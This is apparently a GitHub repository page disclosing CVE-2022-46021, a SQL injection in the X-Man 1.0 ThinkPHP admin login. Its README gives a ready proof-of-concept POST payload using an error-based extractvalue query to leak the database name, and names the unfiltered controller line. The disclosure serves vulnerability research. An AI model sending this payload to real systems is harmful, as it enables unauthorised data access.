Headline
CVE-2022-46021: GitHub - Howard512966/x-man-injection: x-man injection
X-Man 1.0 has a SQL injection vulnerability, which can cause data leakage.
main
Switch branches/tags
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code
Clone
Use Git or checkout with SVN using the web URL.
Open with GitHub Desktop
Download ZIP
Latest commit
Git stats
- 4 commits
Files
Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
README.md
Update README.md
January 6, 2023 03:06
README.md
X-Man is a background system developed based on the ThinkPHP framework. Due to the failure to comply with the ThinkPHP framework development standard, the SQL injection vulnerability was caused when it landed。
Poc: http://ip/admin/login/check
POST: para=username[0]%3Dexp%26username[1]%3D=11 and(select extractvalue(1,concat(0x7e,(select database()))))%26password%3D213%26token%3D
Example:
Analyze: file:https://github.com/imxiny/x-man/blob/master/Application/Admin/Controller/LoginController.class.php
There is no filter of the parameter of the 60th line,So we can construct a SQL injecting POC with the ThinkPHP framework。